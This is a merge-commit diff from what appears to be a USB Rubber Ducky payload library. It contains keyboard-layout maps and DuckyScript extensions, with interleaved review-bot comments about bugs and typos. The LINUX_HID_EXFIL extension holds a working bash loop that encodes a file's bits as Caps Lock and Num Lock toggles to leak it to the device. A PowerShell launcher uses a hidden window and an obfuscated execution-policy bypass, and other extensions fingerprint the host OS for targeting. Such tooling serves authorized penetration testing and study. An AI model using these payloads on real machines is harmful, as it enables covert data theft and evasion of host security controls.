Merge branch 'hak5:master' into master

pull/260/head
HackingMark 2023-03-15 10:06:46 +01:00 committed by GitHub
commit 3f6415327d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
55 changed files with 2201 additions and 376 deletions


@ -99,6 +99,7 @@
"DOWNARROW":"00,00,51", "DOWNARROW":"00,00,51",
"UP":"00,00,52", "UP":"00,00,52",
"UPARROW":"00,00,52", "UPARROW":"00,00,52",
"NUMLOCK":"00,00,53",
"<":"00,00,64", "<":"00,00,64",
"APP":"00,00,65", "APP":"00,00,65",
"MENU":"00,00,65", "MENU":"00,00,65",


@ -56,6 +56,7 @@
"ENTER":"00,00,28", "ENTER":"00,00,28",
"ESC":"00,00,29", "ESC":"00,00,29",
"ESCAPE":"00,00,29", "ESCAPE":"00,00,29",
"BACKSPACE":"00,00,2a",
"TAB":"00,00,2b", "TAB":"00,00,2b",
" ":"00,00,2c", " ":"00,00,2c",
"SPACE":"00,00,2c", "SPACE":"00,00,2c",
@ -102,10 +103,26 @@
"DOWNARROW":"00,00,51", "DOWNARROW":"00,00,51",
"UP":"00,00,52", "UP":"00,00,52",
"UPARROW":"00,00,52", "UPARROW":"00,00,52",
"NUMLOCK":"00,00,53",
"KPAD_SLASH":"00,00,54",
"KPAD_ASTERISK":"00,00,55",
"KPAD_MINUS":"00,00,56",
"KPAD_PLUS":"00,00,57",
"KPAD_ENTER":"00,00,58",
"KPAD_1":"00,00,59",
"KPAD_2":"00,00,5a",
"KPAD_3":"00,00,5b",
"KPAD_4":"00,00,5c",
"KPAD_5":"00,00,5d",
"KPAD_6":"00,00,5e",
"KPAD_7":"00,00,5f",
"KPAD_8":"00,00,60",
"KPAD_9":"00,00,61",
"KPAD_0":"00,00,62",
"KPAD_DOT":"00,00,63",
"\\":"00,00,64", "\\":"00,00,64",
"APP":"00,00,65", "APP":"00,00,65",
"MENU":"00,00,65", "MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00", "CONTROL":"01,00,00",
"CTRL":"01,00,00", "CTRL":"01,00,00",
"SHIFT":"02,00,00", "SHIFT":"02,00,00",
@ -137,6 +154,7 @@
"Z":"02,00,1d", "Z":"02,00,1d",
"!":"02,00,1e", "!":"02,00,1e",
"\"":"02,00,1f", "\"":"02,00,1f",
"£":"02,00,20",
"$":"02,00,21", "$":"02,00,21",
"%":"02,00,22", "%":"02,00,22",
"^":"02,00,23", "^":"02,00,23",
@ -151,19 +169,26 @@
"~":"02,00,31", "~":"02,00,31",
":":"02,00,33", ":":"02,00,33",
"@":"02,00,34", "@":"02,00,34",
"¬":"02,00,35",
"<":"02,00,36", "<":"02,00,36",
">":"02,00,37", ">":"02,00,37",
"?":"02,00,38", "?":"02,00,38",
"|":"02,00,64", "|":"02,00,64",
"CTRL-SHIFT":"03,00,00", "CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00", "ALT":"04,00,00",
"ALT-TAB":"04,00,2b",
"CTRL-ALT":"05,00,00", "CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00", "ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00", "GUI":"08,00,00",
"WINDOWS":"08,00,00", "WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00", "COMMAND":"08,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00", "COMMAND-CTRL":"09,00,00",
"COMMAND-CTRL":"12,00,00", "COMMAND-CTRL-SHIFT":"0b,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00" "COMMAND-OPTION":"0c,00,00",
"COMMAND-OPTION-SHIFT'":"0e,00,00",
"ALTGR":"40,00,00",
"ALTGR-TAB":"40,00,2b",
"¦":"40,00,35",
"CTRL-ALTGR":"41,00,00",
"ALTGR-SHIFT":"42,00,00"
} }
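Review bot: The key "ALT-TAB" is added twice in the new file with conflicting values, `"ALT-TAB":"00,00,71",` just after NUMLOCK and `"ALT-TAB":"04,00,2b",` just after ALT, and JSON parsers generally keep only the occurrence they read last, so which code the tool emits is parser-dependent. Only the second form matches the file's own encoding (ALT modifier byte 04 plus the 2b usage the file already maps for "TAB"), so the first entry should be removed. The stray apostrophe in `"COMMAND-OPTION-SHIFT'":"0e,00,00",` is carried over from the old version and presumably means the token is unreachable under its intended name.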


@ -51,7 +51,8 @@ EXTENSION Rolling_Powershell_Execution
STRING powershell.exe -noP -nOnI -windo H STRING powershell.exe -noP -nOnI -windo H
END_IF END_IF
IF_DEFINED #EXECUTIONPOLICY
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE SPACE
IF (($RANDOM_PS % 2) == 0) THEN IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS STRING -ep ByPasS
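Review bot: Switching to `IF_DEFINED_TRUE #EXECUTIONPOLICY` changes the condition from "the define exists" to "the define is exactly TRUE", and the `DEFINE #EXECUTIONPOLICY` line is outside this hunk, so it is worth confirming it is a TRUE/FALSE define rather than a bare marker; if it is still defined without a value, this branch is silently dropped at compile time. A one-line comment next to the define, `REM #EXECUTIONPOLICY must be TRUE or FALSE (checked with IF_DEFINED_TRUE)`, would make the contract visible. The enclosing IF block continues outside the hunk.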


@ -1,23 +1,26 @@
EXTENSION DETECT_READY EXTENSION DETECT_READY
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE: REM_BLOCK DOCUMENTATION
REM Extension runs inline (here) USAGE:
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic Extension runs inline (here)
REM boot delay Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
REM TARGETS: TARGETS:
REM Any system that reflects CAPSLOCK will detect minimum required delay Any system that reflects CAPSLOCK will detect minimum required delay
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION: REM CONFIGURATION:
DEFINE RESPONSE_DELAY 25 DEFINE #RESPONSE_DELAY 25
DEFINE ITERATION_LIMIT 120 DEFINE #ITERATION_LIMIT 120
VAR $C = 0 VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT)) WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK CAPSLOCK
DELAY RESPONSE_DELAY DELAY #RESPONSE_DELAY
$C = ($C + 1) $C = ($C + 1)
END_WHILE END_WHILE
CAPSLOCK CAPSLOCK
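Review bot: The trailing `CAPSLOCK` on the last line assumes the loop exited because the device's own presses turned caps on, which is not the case when `$_CAPSLOCK_ON` is already TRUE on entry (the loop body never runs) or when `#ITERATION_LIMIT` is reached on a host that does not reflect the LED, where the 120 presses plus the final one leave the host's caps state toggled. OS_DETECTION in this same commit brackets its probing with `SAVE_HOST_KEYBOARD_LOCK_STATE` / `RESTORE_HOST_KEYBOARD_LOCK_STATE`; the same pair here (before the loop and in place of the bare final CAPSLOCK) would at least make the intent explicit and drop the "odd number of presses" assumption. A comment stating that assumption, `REM assumes the loop exited on our own press; see SAVE/RESTORE_HOST_KEYBOARD_LOCK_STATE`, would help until then. END_EXTENSION is outside the hunk.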


@ -1,18 +1,24 @@
EXTENSION EXFIL_AUTO_EOF_DETECT EXTENSION EXFIL_AUTO_EOF_DETECT
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE: REM_BLOCK DOCUMENTATION
REM Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil USAGE:
Call WAIT_FOR_EOF() after starting Keystroke Reflection / HID Exfil
REM TARGETS: TARGETS:
REM Any; intended for use on systems that dont reflect more than 2 lock keys Requires reflection of at least 2 lock keys.
Intended for use on systems that dont reflect more than 2 lock keys.
END_REM
REM CONFIGURATION
DEFINE #INACTIVTY_TARGET 10
FUNCTION WAIT_FOR_EOF() FUNCTION WAIT_FOR_EOF()
VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON VAR $CURRENT_CAPSLOCK_STATE = $_CAPSLOCK_ON
VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON VAR $CURRENT_NUMLOCK_STATE = $_NUMLOCK_ON
VAR $PROCESSING = TRUE VAR $PROCESSING = TRUE
VAR $INACTIVITY_COUNT = 0 VAR $INACTIVITY_COUNT = 0
DEFINE INACTIVTY_TARGET 10
WHILE ($PROCESSING) WHILE ($PROCESSING)
DELAY 20 DELAY 20
IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN IF($CURRENT_CAPSLOCK_STATE != $_CAPSLOCK_ON) THEN
@ -25,7 +31,7 @@ EXTENSION EXFIL_AUTO_EOF_DETECT
LED_R LED_R
ELSE ELSE
$INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1) $INACTIVTY_COUNT = ($INACTIVTY_COUNT + 1)
IF ($INACTIVTY_COUNT >= INACTIVTY_TARGET) THEN IF ($INACTIVTY_COUNT >= #INACTIVTY_TARGET) THEN
$PROCESSING = FALSE $PROCESSING = FALSE
END_IF END_IF
LED_OFF LED_OFF
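Review bot: The counter is declared as `VAR $INACTIVITY_COUNT = 0` in the first hunk but the second hunk increments and compares `$INACTIVTY_COUNT`, so the declared variable is never used and the used one is never declared; depending on how the compiler treats an undeclared `$` name this is either a compile error or a counter that never reaches `#INACTIVTY_TARGET`, which would keep WAIT_FOR_EOF() looping. The smallest fix is to change the declaration to `VAR $INACTIVTY_COUNT = 0` to match the (also misspelled) define, or to correct the define, the declaration and both uses to the INACTIVITY spelling together. WAIT_FOR_EOF()'s body continues outside the hunks.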


@ -1,13 +1,17 @@
EXTENSION HELLO_OS EXTENSION HELLO_OS
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM USAGE: REM_BLOCK DOCUMENTATION
REM For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS() USAGE:
REM prints the OS determination For use with OS_DETECT Extension, call HELLO_OS() after DETECT_OS()
prints the OS determination
END_REM
REM Additional Example: Defining custom $_OS enums REM Additional Example: Defining custom $_OS enums
DEFINE SOME_OTHER_OS 6 DEFINE #EXTRA_EXAMPLES FALSE
DEFINE ANOTHER_OS 7 DEFINE #SOME_OTHER_OS 6
DEFINE #ANOTHER_OS 7
FUNCTION HELLO_OS() FUNCTION HELLO_OS()
IF ($_OS == WINDOWS) THEN IF ($_OS == WINDOWS) THEN
@ -22,12 +26,14 @@ EXTENSION HELLO_OS
STRING Hello ChromeOS! STRING Hello ChromeOS!
ELSE IF ($_OS == ANDROID) THEN ELSE IF ($_OS == ANDROID) THEN
STRING Hello Android! STRING Hello Android!
ELSE IF($_OS == SOME_OTHER_OS) THEN IF_DEFINED_TRUE #EXTRA_EXAMPLES
ELSE IF($_OS == #SOME_OTHER_OS) THEN
REM Example Only REM Example Only
STRING HELLO Custom OS Type! STRING HELLO Custom OS Type!
ELSE IF($_OS == ANOTHER_OS) THEN ELSE IF($_OS == #ANOTHER_OS) THEN
REM Example Only REM Example Only
STRING HELLO Another Custom OS Type! STRING HELLO Another Custom OS Type!
END_IF_DEFINED
ELSE ELSE
STRING Hello World! STRING Hello World!
END_IF END_IF
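Review bot: The example enums `DEFINE #SOME_OTHER_OS 6` and `DEFINE #ANOTHER_OS 7` are presented as free custom values, but nothing here shows they avoid the built-in `$_OS` values (not visible in this hunk), and PASSIVE_WINDOWS_DETECT in this same commit assigns `DEFINE #NOT_WINDOWS 7` to `$_OS`, so a payload combining both extensions with `#EXTRA_EXAMPLES TRUE` would greet a NOT_WINDOWS host as "Another Custom OS Type". A comment on the defines, `REM choose values that do not collide with built-in $_OS enums or other extensions' custom values (e.g. #NOT_WINDOWS 7)`, would flag this for anyone copying the template. HELLO_OS()'s END_FUNCTION is outside the hunks.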


@ -1,44 +1,94 @@
EXTENSION LINUX_HID_EXFIL EXTENSION LINUX_HID_EXFIL
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION REM REQUIRES EXTENSION EXFIL_AUTO_EOF_DETECT
REM Helpers for Linux Keystroke Reflection data exfiltration REM_BLOCK DOCUMENTATION
REM This payload is a proof of concept for USB HID only Data Exfiltration Helpers for Linux Keystroke Reflection data exfiltration
This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET: TARGET:
REM Linux Host that supports opening terminal via CTRL ALT t, and xdotool Linux host that supports opening terminal via CTRL ALT t, and xdotool
REM USAGE: USAGE:
REM Uncomment the function call below to run this extension inline REQUIRES EXFIL_AUTO_EOF_DETECT EXTENSION
REM or call RUN_LINUX_EXFIL() anywhere in your payload after the extension Prepare data to exfil (in filename defined by TARGET_FILE below)
with a terminal window already open - call RUN_LINUX_EXFIL()
REM DEPLOYMENT: DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green. Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
END_REM
REM CONFIGURATION: REM CONFIGURATION:
REM File on host machine to exfil using Keystroke Reflection attack REM File on host machine to exfil using Keystroke Reflection attack
DEFINE TARGET_FILE t.txt DEFINE #TARGET_FILE filename.txt
DEFINE TERMINAL_OPEN_DELAY 500
DEFINE READY_TO_TYPE_DELAY 250 DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
DEFINE #ENABLE_EXFIL_LEDS TRUE
DEFINE #CLOSE_TERMINAL_AFTER_EXFIL TRUE
REM if TRUE will open terminal, prepare data in #TARGET_FILE, and RUN_LINUX_EXFIL()
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
FUNCTION RUN_LINUX_EXFIL() FUNCTION RUN_LINUX_EXFIL()
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_OFF LED_OFF
DELAY READY_TO_TYPE_DELAY
CTRL ALT t
DELAY TERMINAL_OPEN_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE $_EXFIL_LEDS_ENABLED = TRUE
STRINGLN uname -a > TARGET_FILE END_IF_DEFINED
STRINGLN c="xdotool key --delay 4";o=" Caps_Lock";l=" Num_Lock";bs=$(xxd -b TARGET_FILE |cut -d " " -f2-7);for (( i=0;i<${#bs};i++ ));do b="${bs:$i:1}";if [[ "$b" == "0" ]];then c+=$o;fi;if [[ "$b" == "1" ]];then c+=$l;fi;done;eval "$c";exit
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
SAVE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
$_EXFIL_MODE_ENABLED = TRUE
STRING_BASH
c="xdotool key --delay 4";
bs=$(xxd -b
#TARGET_FILE
|cut -d" " -f2-7);
for((i=0;i<${#bs};i++));do
b="${bs:$i:1}";
if [[ "$b" == "0" ]];then
c+=" Caps_Lock";
fi;
if [[ "$b" == "1" ]];then
c+=" Num_Lock";
fi;
done;
$c;
END_STRING
IF_DEFINED_TRUE #CLOSE_TERMINAL_AFTER_EXFIL
STRING exit;
END_IF_DEFINED
ENTER
REM Requires adding EXFIL_AUTO_EOF_DETECT EXTENSION above this one
WAIT_FOR_EOF() WAIT_FOR_EOF()
$_EXFIL_LEDS_ENABLED = FALSE
$_EXFIL_MODE_ENABLED = FALSE $_EXFIL_MODE_ENABLED = FALSE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
$_EXFIL_LEDS_ENABLED = FALSE
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
RESTORE_HOST_KEYBOARD_LOCK_STATE RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
END_FUNCTION END_FUNCTION
REM Uncomment the function call below to run this extension inline (here) IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
REM DEMO Boot Delay
REM RUN_LINUX_EXFIL() DELAY 3000
REM Open Terminal
CTRL ALT t
DELAY 500
REM Perpare some data in TARGET_FILE
STRINGLN uname -a>#TARGET_FILE
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
RUN_LINUX_EXFIL()
END_IF_DEFINED
END_EXTENSION END_EXTENSION
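Review bot: The function no longer opens a terminal itself (the `CTRL ALT t` and its delays moved into the `#RUN_SIMPLE_USAGE_DEMO` block) and USAGE now says to call it "with a terminal window already open", but the TARGET line still reads `Linux host that supports opening terminal via CTRL ALT t, and xdotool`, which now describes only the demo; suggest `Linux host with xdotool (the demo additionally opens a terminal via CTRL ALT t)`. The EXFIL_AUTO_EOF_DETECT requirement is stated three times (the REM above the block, the USAGE line, and the REM before `WAIT_FOR_EOF()`); one place is enough. Also `REM Perpare some data in TARGET_FILE` should read `Prepare`.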


@ -1,202 +1,217 @@
EXTENSION OS_DETECTION EXTENSION OS_DETECTION
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM USB Rubber Ducky Host OS Detection REM_BLOCK DOCUMENTATION
REM Generic OS detection at a high view is a moving target USB Rubber Ducky Host OS Detection
REM results may vary greatly depending Generic OS detection at a high view is a moving target
REM on a combination of many variables: results may vary greatly depending
REM - number of testing stages on a combination of many variables:
REM - specific devices and versions tested against - number of testing stages
REM - number of systems testing for (scope) - specific devices and versions tested against
REM - detection techniques (passive/invisible/active/hybrid) - number of systems testing for (scope)
REM - overall speed - detection techniques (passive/invisible/active/hybrid)
REM - overall accuracy - overall speed
- overall accuracy
REM TARGET: If all you require is windows vs <anything other os> detection, the
REM DEFAULT - Windows, Mac, Linux PASSIVE_WINDOWS_DETECT extension is recommended over this extension.
REM ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
REM USAGE: TARGET:
REM Uncomment the function call below to run this extension inline (here) DEFAULT - Windows, Mac, Linux
REM or call DETECT_OS() anywhere in your payload after the extension ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android
REM Place this extension and the DETECT_OS() before
REM you would like to first reference $_OS to execute payload code conditionally USAGE:
Uncomment the function call below to run this extension inline (here)
or call DETECT_OS() anywhere in your payload after the extension
Place this extension and the DETECT_OS() before
you would like to first reference $_OS to execute payload code conditionally
FEEDBACK:
As mentioned above, this a moving target (especially for mac systems)
Please report any issues identifying specific operating systems.
Your feedback will greatly help solidify the robustness of this extension
DEBUGGING:
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
END_REM
REM CONFIGURATION: REM CONFIGURATION:
DEFINE VERBOSE FALSE REM For Debugging:
DEFINE ADVANCED_DETECTION FALSE DEFINE #DEBUGGING_OUTPUT FALSE
DEFINE STARTUP_DELAY 1500 DEFINE #ADVANCED_DETECTION FALSE
DEFINE RESTART_WAIT 1000 REM Timing fine tuning:
DEFINE CONNECT_WAIT 1000 DEFINE #STARTUP_DELAY 1500
DEFINE OS_DETECT_MODE HID DEFINE #RESTART_WAIT 1000
DEFINE OS_DETECT_VID VID_05AC DEFINE #CONNECT_WAIT 1000
DEFINE OS_DETECT_PID PID_021E DEFINE #OS_DETECT_MODE HID
DEFINE WINDOWS_HOST_REQUEST_COUNT 2 DEFINE #OS_DETECT_VID VID_05AC
DEFINE HOST_RESPONSE_TIMEOUT 1000 DEFINE #OS_DETECT_PID PID_021E
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #HOST_RESPONSE_TIMEOUT 1000
FUNCTION DETECT_OS() FUNCTION DETECT_OS()
$_HOST_CONFIGURATION_REQUEST_COUNT = 0 $_HOST_CONFIGURATION_REQUEST_COUNT = 0
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY STARTUP_DELAY DELAY #STARTUP_DELAY
SAVE_HOST_KEYBOARD_LOCK_STATE SAVE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
IF ADVANCED_DETECTION THEN IF_DEFINED_TRUE #ADVANCED_DETECTION
STRING ADVANCED OS DETECT STRING ADVANCED OS DETECT
ELSE ELSE_DEFINED
STRING OS DETECT STRING OS DETECT
END_IF END_IF_DEFINED
ENTER ENTER
STRING test caps STRING test caps
END_IF END_IF_DEFINED
IF ($_CAPSLOCK_ON == FALSE) THEN IF ($_CAPSLOCK_ON == FALSE) THEN
LED_R LED_R
CAPSLOCK CAPSLOCK
DELAY HOST_RESPONSE_TIMEOUT DELAY #HOST_RESPONSE_TIMEOUT
END_IF END_IF
LED_OFF LED_OFF
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING test done STRING test done
END_IF END_IF_DEFINED
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING received led response STRING received led response
END_IF END_IF_DEFINED
LED_G LED_G
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING prediction: Windows STRING prediction: Windows
END_IF END_IF_DEFINED
$_OS = WINDOWS $_OS = WINDOWS
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING prediction: Linux STRING prediction: Linux
END_IF END_IF_DEFINED
$_OS = LINUX $_OS = LINUX
END_IF END_IF
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING no led response STRING no led response
ENTER ENTER
STRING prediciton: MacOS STRING prediciton: MacOS
END_IF END_IF_DEFINED
$_OS = MACOS $_OS = MACOS
END_IF END_IF
IF ADVANCED_DETECTION THEN IF_DEFINED_TRUE #ADVANCED_DETECTION
IF ( $_OS == LINUX ) THEN IF ( $_OS == LINUX ) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING soft reconnect STRING soft reconnect
END_IF END_IF_DEFINED
ATTACKMODE OFF ATTACKMODE OFF
DELAY RESTART_WAIT DELAY #RESTART_WAIT
ATTACKMODE OS_DETECT_MODE OS_DETECT_VID OS_DETECT_PID ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
DELAY CONNECT_WAIT DELAY #CONNECT_WAIT
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING reconnected STRING reconnected
END_IF END_IF_DEFINED
IF ($_CAPSLOCK_ON == TRUE) THEN IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING caps led on STRING caps led on
ENTER ENTER
STRING test numlock STRING test numlock
END_IF END_IF_DEFINED
NUMLOCK NUMLOCK
DELAY HOST_RESPONSE_TIMEOUT DELAY #HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING test done STRING test done
END_IF END_IF_DEFINED
IF ($_NUMLOCK_ON == FALSE) THEN IF ($_NUMLOCK_ON == FALSE) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING no numlock led STRING no numlock led
ENTER ENTER
STRING prediciton: ChromeOS STRING prediciton: ChromeOS
END_IF END_IF_DEFINED
$_OS = CHROMEOS $_OS = CHROMEOS
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING numlock led on STRING numlock led on
ENTER ENTER
STRING testing scrolllock STRING testing scrolllock
END_IF END_IF_DEFINED
SCROLLLOCK SCROLLLOCK
DELAY HOST_RESPONSE_TIMEOUT DELAY #HOST_RESPONSE_TIMEOUT
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING test done STRING test done
END_IF END_IF_DEFINED
IF ($_SCROLLLOCK_ON == TRUE) THEN IF ($_SCROLLLOCK_ON == TRUE) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING scrolllock led on STRING scrolllock led on
ENTER ENTER
STRING prediciton: Android STRING prediciton: Android
END_IF END_IF_DEFINED
$_OS = ANDROID $_OS = ANDROID
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING no scrolllock reply STRING no scrolllock reply
ENTER ENTER
STRING prediction: Linux STRING prediction: Linux
END_IF END_IF_DEFINED
$_OS = LINUX $_OS = LINUX
END_IF END_IF
END_IF END_IF
END_IF END_IF
ELSE IF ($_OS == MACOS) THEN ELSE IF ($_OS == MACOS) THEN
IF ($_CAPSLOCK_ON == TRUE) THEN IF ($_CAPSLOCK_ON == TRUE) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING caps led on STRING caps led on
ENTER ENTER
STRING prediction: iOS STRING prediction: iOS
END_IF END_IF_DEFINED
$_OS = IOS $_OS = IOS
ELSE ELSE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING no caps reply STRING no caps reply
ENTER ENTER
STRING prediction: MacOS STRING prediction: MacOS
END_IF END_IF_DEFINED
$_OS = MACOS $_OS = MACOS
END_IF END_IF
ELSE IF ($_OS == WINDOWS) THEN ELSE IF ($_OS == WINDOWS) THEN
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING Confident Windows Prediction STRING Confident Windows Prediction
END_IF END_IF_DEFINED
$_OS = WINDOWS $_OS = WINDOWS
END_IF END_IF
END_IF END_IF_DEFINED
RESTORE_HOST_KEYBOARD_LOCK_STATE RESTORE_HOST_KEYBOARD_LOCK_STATE
IF VERBOSE THEN IF_DEFINED_TRUE #DEBUGGING_OUTPUT
ENTER ENTER
STRING OS_DETECT complete STRING OS_DETECT complete
ENTER ENTER
END_IF END_IF_DEFINED
END_FUNCTION END_FUNCTION
REM Uncomment the function call below to run this extension inline (here) REM Uncomment the function call below to run this extension inline (here)
REM or call DETECT_OS() anywhere in your payload after the extension REM or call DETECT_OS() anywhere in your payload after the extension
REM DETECT_OS() REM DETECT_OS()
END_EXTENSION END_EXTENSION
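Review bot: Three of the debug strings misspell "prediction" — `STRING prediciton: MacOS`, `STRING prediciton: ChromeOS` and `STRING prediciton: Android` — while the neighbouring branches use `STRING prediction: Linux` and `STRING prediction: iOS`, so anyone filtering captured debug output on one spelling misses half the results; change the three to `STRING prediction: ...`. The DEBUGGING entry in the REM_BLOCK could also state plainly that the output is injected as keystrokes, e.g. `Debug output is typed into whatever window has focus; enable only on a test host with an editor focused.`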


@ -1,21 +1,24 @@
EXTENSION PASSIVE_DETECT_READY EXTENSION PASSIVE_DETECT_READY
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM Passive Detect Ready - no injection dynamic boot delay REM_BLOCK DOCUMENTATION
REM for hosts that reflect current OS lock key state on connect Passive Detect Ready - no injection dynamic boot delay
for hosts that reflect current OS lock key state on connect
REM USAGE: USAGE:
REM Extension runs inline (here) Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay boot delay
END_REM
REM CONFIGURATION: REM CONFIGURATION:
DEFINE MAX_WAIT 150 DEFINE #MAX_WAIT 150
DEFINE CHECK_INTERVAL 20 DEFINE #CHECK_INTERVAL 20
VAR $MAX_TRIES = MAX_WAIT VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY CHECK_INTERVAL DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1) $MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE END_WHILE
END_EXTENSION END_EXTENSION
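Review bot: `DEFINE #MAX_WAIT 150` reads as a duration but is consumed as a poll count (`VAR $MAX_TRIES = #MAX_WAIT`, decremented once per `DELAY #CHECK_INTERVAL`), so the real upper bound is 150 × 20 ms = 3000 ms and anyone "raising the wait" to a millisecond value would multiply it by 20. A comment on the define, `REM number of #CHECK_INTERVAL polls: 150 x 20ms = 3000ms worst case`, removes the ambiguity; the same pair of defines appears in PASSIVE_WINDOWS_DETECT in this commit and would benefit from the same note.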


@ -1,37 +1,42 @@
EXTENSION PASSIVE_WINDOWS_DETECT EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.0 REM VERSION 1.1
REM AUTHOR: Korben
REM Windows fully passive OS Detection and passive Detect Ready REM_BLOCK DOCUMENTATION
REM Includes its own passive detect ready. Does not require Windows fully passive OS Detection and passive Detect Ready
REM additional extensions Includes its own passive detect ready.
Does not require additional extensions.
REM USAGE: USAGE:
REM Extension runs inline (here) Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay boot delay
REM $_OS will be set to WINDOWS or NOT_WINDOWS $_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION: REM CONFIGURATION:
DEFINE MAX_WAIT 150 DEFINE #MAX_WAIT 150
